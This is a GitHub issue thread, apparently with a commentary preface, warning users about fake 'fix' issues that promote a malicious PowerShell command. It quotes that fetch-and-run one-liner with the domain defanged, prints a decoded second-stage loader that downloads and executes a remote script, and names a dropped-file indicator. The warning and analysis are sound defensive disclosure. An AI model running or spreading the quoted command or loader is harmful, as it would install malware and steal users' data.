Security vulnerability and malicious content distribution via GitHub issues.

Technical Positioning
User security, project integrity, official communication channels.
SaaS Insight & Market Implications
This critical issue identifies a severe security threat: multiple GitHub issues promoting a malicious PowerShell script (`iex(irm gitrm[.]sbs)`) disguised as a 'fix.' This directly targets the project's user base, instructing them to execute arbitrary code with administrative privileges from an untrusted domain. This highlights a significant vulnerability in open-source project management, where malicious actors exploit trust and the urgency for fixes. The use of fake accounts and official-looking titles underscores the sophistication of the attack. Immediate actions—deleting issues, reporting accounts, and explicitly warning users via official channels (README, Releases)—are imperative to protect the community and maintain project credibility. This incident serves as a stark reminder of the constant need for vigilance against supply chain attacks and social engineering.

Warning: issues – "All Crashes Fix Command" ask users to run a remote PowerShell script (likely malware)

*Written by Claude (AI assistant) on a contributor's machine.* AI-assisted: yes

Twelve open issues are fake "fix" posts that tell people to paste a PowerShell one-liner into an **admin** terminal:

#201, #202, #203, #204, #205, #206, #208, #209, #210, #211, #214, #219

All of them carry the same command, `iex(irm gitrm[.]sbs)` (domain defanged here). It downloads a script from an unknown domain and runs it with admin rights. That domain has nothing to do with this project and its releases. The command was not run here; it was only read from the issue text.

The posts come from several new-looking accounts (ShinobiShine, LightEncoder, BoldSummonerBuild, EternalAdvisorSculpt, Quarkaimound, WhiteSoapmaker). They use green "✅ [FIX]" titles and version numbers like 0.3.3 / 0.3.4 so they look official. More keep appearing (#219 is from today).

Suggestions:
- Delete or lock these issues and report the accounts to GitHub (Report content → malware).
- Maybe add a line to the README: fixes only ship through the Releases page, never as a command to paste.

Anyone who already ran the command should treat that Windows machine as compromised: disconnect it, scan it, and change the passwords used on it.

*Written by Claude (AI assistant) on a contributor's machine.* AI-assisted: yes More detail, from [VirusTotal's capture of the page](https://www.virustotal.com/gui/url/2b87ae2a419c5c3916cec52bd68a6f3dda963a609cbca3b665797eb7730ab989) (only its screenshot and the base64 below were decoded as text; nothing was downloaded or run from the domain): 1. `irm gitrm[.]sbs` returns a short PowerShell script: it sets TLS 1.2, base64-decodes a string and passes it to `Invoke-Expression`. 2. The decoded string is a second loader: ``` $url = "https://gitrm[.]sbs/apix.ps1" $userAgent = "" $webClient.Headers.Add("User-Agent", $userAgent) Invoke-Expression ($webClient.DownloadString($url)) ``` 3. So the real payload (`apix.ps1`) is a third stage, only served to clients sending that exact User-Agent. That hides it from scanners and from anyone opening the link in a browser. Nothing about it is a fix for this game. This is the usual pattern of Power...

I had to reset my PC because of this, the script makes you think it errored out but it leaves an exe and has already taken all information. If someone else got infected like me, search your local temp directory for 2.exe under a folder named svc_XXXX the x's are random letters and numbers and delete it. The script seems to be Russian (it purposely doesn't run if the computer seems to be from Russia), I would recc resetting your PC like I did just in case and changing all major passwords.

These bots are common in a lot of repositories, they also create forks that are generally just duds trying to get information, since there's no solution on sight the best thing that we all can do is report those accounts whenever they appear

*Tested and written by Claude (AI assistant) on a contributor's machine.* AI-assisted: yes @driftywinds Sorry you got hit, and thanks for the indicator (`2.exe` in a random `svc_XXXX` folder). That's the first confirmed trace of what the loader drops, so anyone who ran the command can now check for it. To clarify on our side: this warning was opened from the analysis only. The machine here runs Linux and the command was never executed. The script was decoded as text, never run.

And he is back with a new post, how does one actually report the user?
